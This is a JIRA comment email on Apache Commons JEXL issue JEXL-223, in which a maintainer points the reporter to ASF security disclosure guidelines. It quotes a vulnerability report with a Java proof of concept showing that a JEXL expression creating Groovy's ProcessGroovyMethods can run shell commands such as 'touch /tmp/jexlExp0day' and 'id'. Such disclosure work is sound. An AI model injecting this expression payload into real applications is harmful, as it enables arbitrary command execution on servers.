[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15978236#comment-15978236 ]
Bruno P. Kinoshita commented on JEXL-223: ----------------------------------------- Edited to add code format. Also, see http://www.apache.org/security/. For Security/Vulnerabilities issues, it is better to follow the guidelines provided by the ASF Security Team when disclosing issues like this. > Apache Commons JEXL Expression Execute Command Vulnerabilitity > -------------------------------------------------------------- > > Key: JEXL-223 > URL: https://issues.apache.org/jira/browse/JEXL-223 > Project: Commons JEXL > Issue Type: Bug > Reporter: cnbird > Priority: Critical > > 0x01 Summary > Apache Commons JEXL Expression Execute Command Vulnerabilitity throught > groovy. > 0x02 POC > {code} > import java.io.IOException; > import java.util.List; > import org.apache.commons.jexl3.JexlBuilder; > import org.apache.commons.jexl3.JexlContext; > import org.apache.commons.jexl3.JexlEngine; > import org.apache.commons.jexl3.JexlExpression; > import org.apache.commons.jexl3.MapContext; > import org.codehaus.groovy.runtime.ProcessGroovyMethods; > public class elExp { > public static void main(String args[]) throws IOException { > // Create or retrieve an engine > JexlEngine jexl = new JexlBuilder().create(); > // Create an expression > //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")"; > ProcessGroovyMethods n = new ProcessGroovyMethods(); > System.out.println(n.execute("id").toString()); > String jexlExp = > "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch > /tmp/jexlExp0day\")"; > JexlExpression e = jexl.createExpression( jexlExp ); > try { > > Process process = new ProcessBuilder("id").start(); > } catch (IOException e1) { > // TODO Auto-generated catch block > e1.printStackTrace(); > } > // Create a context and add data > JexlContext jc = new MapContext(); > jc.set("foo", jexlExp ); > > // Now evaluate the expression, getting the result > Object o = e.evaluate(jc); > System.out.println(o); > } > } > {code} -- This message was sent by Atlassian JIRA (v6.3.15#6346)